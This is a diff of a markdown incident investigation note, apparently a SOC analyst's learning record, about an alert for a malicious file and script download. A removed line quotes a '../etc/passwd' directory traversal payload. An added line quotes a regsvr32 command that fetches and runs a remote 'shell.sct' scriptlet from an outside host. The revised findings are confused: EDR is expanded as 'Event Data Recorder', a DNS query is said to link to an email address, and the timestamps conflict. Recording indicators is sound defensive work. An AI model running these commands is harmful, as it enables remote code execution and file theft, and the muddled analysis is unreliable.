Tmitchy/-SOC-Incident-Documentation/investigations/001-Malicious-FileScript-Download-Attempt-Alert.md

 - Logs/tools reviewed:
    - Log Management Tool: To confirm the connection pattern and frequency.
    - Endpoint Security (EDR): To check what process on the host initiated the connection.
-   - Endpoint Security (EDR): To collect data from the network action, terminal history, and browser history plugins on the host that initiated the connection..
+   - Endpoint Security (EDR): To collect data from the network action, terminal history, and browser history plugins on the host that initiated the connection.
    - DNS logs: To see if the destination IP was reached via a domain lookup or a hardcoded IP.
-   - VirusTotal: Checked the reputation of the source IP and any associated domain.
+   - VirusTotal: Checked the reputation of the source IP, associated domain, and the malicious attachment.
 - Indicators found:
-   - The source IP `84.38.130.118`, port `24124`, sent a POST request to the firewall(Check Point Security Gateway) requesting the `/clients/MyCRL` remote path to access the directory where the users are stored by modifying and sending another POST request that contain the directory traversal payload `aCSHELL/../../../../../../../../../../etc/passwd`.
-   - EDR failed to indicate that the connection originated from the firewall shell; instead, it provided details about the network connection, showing the destination IP address and the active processes, including their IDs.
+   - The source IP address `84.38.130.118` on port `80`, along with the email address `projectmanagement@pm.me`, sent an email to the destination IP address mentioned above.
+The email contained more than 20 words and included a malicious attachment that claimed to be from the project management team.
+   - The EDR (Event Data Recorder) provided crucial information that was identified as **vital** for analysis, along with the specific time and date when this data was flagged.
+This information is essential for understanding the context and circumstances surrounding the event:
+       - Feb 04 2025 08:06:42 - Source IP: `84.38.130.118`
+       - Feb 04 2025 08:06:08 - `"C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"`
-   - No matching DNS query preceded the connections — the IP was hardcoded, not resolved via a domain.
+   - A matching DNS query was submitted linking to the source IP: `projectmanagement@pm.me`.
    - VirusTotal flagged the IP as malicious (7/94 vendors), associated with China Unicom Global.

 - Any pivoting done: